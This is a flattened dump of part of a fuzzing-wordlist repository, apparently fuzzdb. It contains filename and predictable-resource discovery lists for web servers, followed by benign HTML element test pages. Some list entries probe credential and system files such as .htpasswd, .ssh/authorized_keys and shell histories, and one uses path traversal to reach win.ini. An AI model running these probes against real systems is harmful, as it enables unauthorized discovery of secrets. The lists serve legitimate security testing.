91 | xml 92 | xsl 93 | zip 94 | -------------------------------------------------------------------------------- /discovery/FilenameBruteforce/copy_of.fuzz.txt: -------------------------------------------------------------------------------- 1 | Copy_(1)_of_ 2 | Copy_(2)_of_ 3 | Copy%20of%20 4 | Copy_of_ 5 | Copy_ 6 | Copy%20 7 | _ 8 | %20 9 | -------------------------------------------------------------------------------- /discovery/PredictableRes/AdobeXML.fuzz.txt: -------------------------------------------------------------------------------- 1 | /flex2gateway/ 2 | /flex2gateway/http 3 | /flex2gateway/httpsecure 4 | /flex2gateway/cfamfpoolling 5 | /flex2gateway/amf 6 | /flex2gateway/amfpolling 7 | /messagebroker/http 8 | /messagebroker/httpsecure 9 | /blazeds/messagebroker/http 10 | /blazeds/messagebroker/httpsecure 11 | /samples/messagebroker/http 12 | /samples/messagebroker/httpsecure 13 | /lcds/messagebroker/http 14 | /lcds/messagebroker/httpsecure 15 | /lcds-samples/messagebroker/http 16 | /lcds-samples/messagebroker/httpsecure 17 | -------------------------------------------------------------------------------- /discovery/PredictableRes/Apache.fuzz.txt: -------------------------------------------------------------------------------- 1 | /.htaccess 2 | /.htaccess.bak 3 | /.htpasswd 4 | /.meta 5 | /.web 6 | /apache/logs/access.log 7 | /apache/logs/access_log 8 | /apache/logs/error.log 9 | /apache/logs/error_log 10 | /httpd/logs/access.log 11 | /httpd/logs/access_log 12 | /httpd/logs/error.log 13 | /httpd/logs/error_log 14 | /logs/access.log 15 | /logs/access.log 16 | /logs/error.log 17 | /logs/error_log 18 | /access_log 19 | /cgi 20 | /cgi-bin 21 | /cgi-pub 22 | /cgi-script 23 | /dummy 24 | /error 25 | /error_log 26 | /htdocs 27 | /httpd 28 | /httpd.pid 29 | /icons 30 | /index.html 31 | /logs 32 | /manual 33 | /phf 34 | /printenv 35 | /server-info 36 | /server-status 37 | /status 38 | /test-cgi 39 | /tmp 40 | /~bin 41 | /~ftp 42 | /~nobody 43 | /~root 44 | -------------------------------------------------------------------------------- /discovery/PredictableRes/CGI_HTTP_POST.fuzz.txt: -------------------------------------------------------------------------------- 1 | post-query 2 | Config1.htm 3 | My_eGallery/public/displayCategory.php 4 | servlet/custMsg?guestName= 10 | /.cobalt/sysManage/../admin/.htaccess 11 | /.fhp 12 | /.forward 13 | /.history 14 | /.htaccess 15 | /.htaccess.old 16 | /.htaccess.save 17 | /.htaccess~ 18 | /.htpasswd 19 | /.lynx_cookies 20 | /.mysql_history 21 | /.nsconfig 22 | /.nsf/../winnt/win.ini 23 | /.passwd 24 | /.perf 25 | /.pinerc 26 | /.plan 27 | /.proclog 28 | /.procmailrc 29 | /.profile 30 | /.psql_history 31 | /.rhosts 32 | /.sh_history 33 | /.ssh 34 | /.ssh/authorized_keys 35 | /.ssh/known_hosts 36 | /.www_acl 37 | /.wwwacl 38 | /.access 39 | /.cobalt 40 | /.cobalt/alert/service.cgi?service= 41 | /.cobalt/alert/service.cgi?service= 42 | /.fhp 43 | /.htaccess 44 | /.htaccess.old 45 | /.htaccess.save 46 | /.htaccess~ 47 | /.htpasswd 48 | /.nsconfig 49 | /.passwd 50 | /.www_acl 51 | /.wwwacl 52 | -------------------------------------------------------------------------------- /discovery/PredictableRes/Vignette.fuzz.txt: -------------------------------------------------------------------------------- 1 | /0,,,00 2 | /0,,,00.html 3 | /1,,,00 4 | /1,,,00.html 5 | /CDA 6 | /CDS 7 | /CMA 8 | /CMS 9 | /Deleting 10 | /Docs 11 | /Editing 12 | /HOME 13 | /Images 14 | /Internal 15 | /MetaDataUpdate 16 | /Report 17 | /Select 18 | /StoryServer 19 | /TMT 20 | /VGN 21 | /XML 22 | /ac 23 | /allvars 24 | /asp 25 | /aspstatus 26 | /cda 27 | /cds 28 | /cma 29 | /cms 30 | /controller 31 | /diag 32 | /docs 33 | /edit 34 | /error 35 | /errorpage 36 | /errors 37 | /executequery 38 | /external 39 | /home 40 | /ibm 41 | /initialize 42 | /internal 43 | /jsp 44 | /jspstatus 45 | /jsptest 46 | /legacy 47 | /license 48 | /listcolumns 49 | /login 50 | /loginlogo 51 | /logo 52 | /main 53 | /menu 54 | /metadataupdate 55 | /performance 56 | /portal 57 | /ppstats 58 | /preview 59 | /previewer 60 | /record 61 | /reset 62 | /save 63 | /stat 64 | /status 65 | /storyserver 66 | /style 67 | /stylepreviewer 68 | /utils 69 | /vdc 70 | /vgn 71 | /vr 72 | /Ping.jsp 73 | /HelloWorld.jsp 74 | -------------------------------------------------------------------------------- /discovery/PredictableRes/proxy-conf.fuzz.txt: -------------------------------------------------------------------------------- 1 | /pac/ 2 | /proxy/ 3 | /.pac/ 4 | /managers/ 5 | /admin/ 6 | /employees/ 7 | /users/ 8 | /proxy/pac/ 9 | .pac 10 | proxy.pac 11 | /.pac/.pac 12 | /.pac/proxy.pac 13 | /proxy/.pac 14 | /proxy/proxy.pac 15 | /pac/.pac 16 | /pac/proxy.pac 17 | /managers/.pac 18 | /managers/proxy.pac 19 | /admin/.pac 20 | /admin/proxy.pac 21 | /employees/.pac 22 | /employees/proxy.pac 23 | /users/.pac 24 | /users/proxy.pac 25 | /proxy/pac/proxy.pac 26 | /proxy/pac/.pac 27 | users.pac 28 | admin.pac 29 | managers.pac 30 | employees.pac 31 | guest.pac 32 | -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-large-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-large-directories-lowercase.txt -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-large-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-large-directories.txt -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-large-extensions-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-large-extensions-lowercase.txt -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-large-extensions.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-large-extensions.txt -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-large-files-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-large-files-lowercase.txt -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-large-files.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-large-files.txt -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-medium-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-medium-directories-lowercase.txt -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-medium-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-medium-directories.txt -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-small-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-small-directories-lowercase.txt -------------------------------------------------------------------------------- /discovery/PredictableRes/raft-small-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/discovery/PredictableRes/raft-small-directories.txt -------------------------------------------------------------------------------- /docs/misc/Web-Shells-rev2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/Web-Shells-rev2.pdf -------------------------------------------------------------------------------- /docs/misc/Wireshark_Display_Filters.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/Wireshark_Display_Filters.pdf -------------------------------------------------------------------------------- /docs/misc/html-element-index/css/examples/cssinline.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/css/examples/cssinline.htm -------------------------------------------------------------------------------- /docs/misc/html-element-index/css/syntax/pseudo/pclasslang.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/css/syntax/pseudo/pclasslang.htm -------------------------------------------------------------------------------- /docs/misc/html-element-index/html/topics/mailto.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/html/topics/mailto.htm -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/0.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/0.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/1.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/2.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/3.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/3.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/4.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/4.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/5.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/5.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/6.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/6.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/7.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/7.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/8.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/8.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/9.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/9.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/a.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/a.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/analysis.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/analysis.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/b.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/b.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/branch.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/branch.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/c.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/c.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/clear.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/clear.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/csstab.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/csstab.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/d.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/d.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/e.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/e.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/f.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/f.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/flat.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/flat.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/htmltab.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/htmltab.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/leaf.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/leaf.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/minus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/minus.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/paypallogo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/paypallogo.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/plus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/plus.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote171.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote171.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote187.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote187.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote34.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote34.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote39.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote39.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote8216.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote8216.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote8217.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote8217.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote8220.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote8220.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote8221.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote8221.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote8222.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote8222.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote8249.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote8249.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/quote8250.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/quote8250.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-3dl-color.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-3dl-color.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-arrow-color.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-arrow-color.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-base-color.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-base-color.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-default.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-default.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-ds-color.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-ds-color.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-face-color.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-face-color.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-highlight-color.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-highlight-color.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-pieces.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-pieces.jpg -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-shadow-color.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-shadow-color.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/scrollbar-track-color.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/scrollbar-track-color.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/straight.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/straight.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/toolbarbl.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/toolbarbl.jpg -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/toolbartop.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/toolbartop.jpg -------------------------------------------------------------------------------- /docs/misc/html-element-index/images/trans.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/docs/misc/html-element-index/images/trans.gif -------------------------------------------------------------------------------- /docs/misc/html-element-index/scripts/csschange.js: -------------------------------------------------------------------------------- 1 | 2 | function readSS() 3 | { 4 | if (document.getElementById || document.all()) 5 | { 6 | var allCookies = document.cookie; 7 | var Path = ""; 8 | var ss = "2"; 9 | 10 | Path = location.href.substring(0,location.href.indexOf("indexdot/")+9); 11 | 12 | if (allCookies != "") // A cookie has been set 13 | { 14 | var strLen = allCookies.length; 15 | var beginPos = allCookies.indexOf("ss="); 16 | 17 | if (beginPos != -1) 18 | { ss = allCookies.substring(beginPos+3, beginPos+4); } 19 | 20 | if (Path != "" && ss != "2") // Only switch if cookie exists and CSS is not the default 21 | { 22 | theFile = Path + "ss/" + ss + ".css"; 23 | if (document.getElementById) 24 | { eval("document.getElementById(\"thecss\").href = \"" + theFile + "\""); } 25 | else // IE 4/5 case 26 | { eval("document.all.tags(\"thecss\")[0].href = \"" + theFile + "\""); } 27 | } 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /docs/misc/html-element-index/scripts/search.js: -------------------------------------------------------------------------------- 1 | function setSearchRoot() 2 | { 3 | // Set this variable to your own domain if you are an official mirror 4 | var siteRoot = "www.blooberry.com"; 5 | 6 | document.forms[0].domains.value = siteRoot; 7 | document.forms[0].sitesearch.value = siteRoot; 8 | 9 | } -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/blank.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | blank document 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/a/abbr-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ABBR: Browser peculiarity - rendering effects in Netscape and Opera 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
    15 |
  1. Netscape 6.1 applies an underline effect to this element along 16 | with a special mouse cursor when hovering (an arrow with a question mark.) Later 17 | versions apply only a dotted underline effect.
  2. 18 |
  3. Opera 7+ applies a dotted underline effect to this element; 19 | in previous versions no special extra formatting was applied.
  4. 20 |
21 | 22 |
23 | filler text Abbreviationword filler text 24 |
25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/a/abbr-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: ABBR element 6 | 7 | 8 | 9 | 10 |

Code example: ABBR element

11 | 12 |
13 | filler text fax filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/a/acronym-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: ACRONYM element 6 | 7 | 8 | 9 | 10 |

Code example: ACRONYM element

11 | 12 |
13 | filler text WWW filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/a/address-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: ADDRESS element 6 | 7 | 8 | 9 | 10 |

Code example: ADDRESS element

11 | 12 |
13 | filler text
1234 Nowhere St.
Anywhere, State 00001-9999
filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/a/ahref-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | A HREF: Browser peculiarity - TITLE used as label for IE FAVORITES 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
IE4+ uses the TITLE attribute as the Favorites label for a URL 15 | when placed via the right-mouseclick context menu.
16 |
17 | 18 | Hyperlink to a document, no TITLE attribute. 19 | Right click...Add to favorites to see the Name label used 20 |
21 | filler text http://www.yahoo.com/ filler text 22 |
23 |
24 | 25 | Hyperlink to a document, TITLE="this is a title" present. 26 | Right click...Add to favorites to see the Name label used 27 |
28 | filler text http://www.yahoo.com/ filler text 29 |
30 |
31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/a/applet-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | APPLET: Browser peculiarity - mouse events and select/highlighting an applet 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
A bad bug exists in the Netscape 6 betas where selecting text 15 | that included an applet would crash the browser if a mouse event handler was 16 | attached to the applet. This was fixed by 6.0 final.
17 |
18 |
19 | 20 | Test: Use the mouse to select the "filler text" on both sides of the applet 21 |
22 | filler text 23 | 25 | 26 | 27 | filler text
28 |
29 |
30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/a/arealocaltest.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | AREA: Default destination 6 | 7 | 8 | 9 | 10 |

Destination for default AREA link

11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/b-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: B element 6 | 7 | 8 | 9 | 10 |

Code example: B element

11 | 12 |
13 | filler text bold text filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/base-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BASE: Browser Peculiarities: Handling improperly terminated URLs 6 | 7 | 10 | 11 | 12 | 13 | 14 | Assertion: 15 |
Netscape and Opera both ignore improperly terminated URLs used 16 | as the BASE HREF value. eg: relative URLs in a document that used "http://www.blooberry.com" 17 | as the HREF would resolve to "http://[relative URL]", and "http://www.blooberry.com/indexdot" 18 | would resolve to "http://www.blooberry.com/[relative URL]". To prevent this problem, use 19 | a trailing "/" character to properly terminate the URL. Internet Explorer, by the way, accepts both URL forms.
20 |
21 | 22 | BASE element refers to "http://www.blooberry.com/indexdot/", hyperlink refers to "index.html"
23 | (Should successfully link to the Indexdot main page):
24 |
25 | filler text 26 | Link to "index.html" 27 | filler text 28 |
29 |
30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/base-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BASE: Browser Peculiarities: Handling improperly terminated URLs 6 | 7 | 10 | 11 | 12 | 13 | 14 | Assertion: 15 |
Netscape and Opera both ignore improperly terminated URLs used 16 | as the BASE HREF value. eg: relative URLs in a document that used "http://www.blooberry.com" 17 | as the HREF would resolve to "http://[relative URL]", and "http://www.blooberry.com/indexdot" 18 | would resolve to "http://www.blooberry.com/[relative URL]". To prevent this problem, use 19 | a trailing "/" character to properly terminate the URL. Internet Explorer, by the way, accepts both URL forms.
20 |
21 | 22 | BASE element refers to "http://www.blooberry.com/indexdot", hyperlink refers to "index.html"
23 | (Should link to the blooberry.com site main page instead of the Indexdot main page like you might expect):
24 |
25 | filler text 26 | Link to "index.html" 27 | filler text 28 |
29 |
30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/basefont-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BASEFONT: Browser peculiarity - application on heading levels 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
Neither Internet Explorer or Netscape 1.0-4.x apply the BASEFONT 15 | SIZE attribute value to heading levels. Internet Explorer does apply the FACE and 16 | COLOR values to headings though.
17 |
18 | 19 | Plain H3 element:
20 |
21 | filler text 22 |

H3 element H3 element

23 | filler text 24 |
25 |
26 | 27 | H3 element enclosed in BASEFONT color=green:
28 |
29 | filler text 30 | 31 | basefont color=green 32 |

H3 element H3 element

33 | basefont color=green 34 | 35 | filler text 36 |
37 |
38 | 39 | H3 element enclosed in BASEFONT face=verdana:
40 |
41 | filler text 42 | 43 | basefont face=verdana 44 |

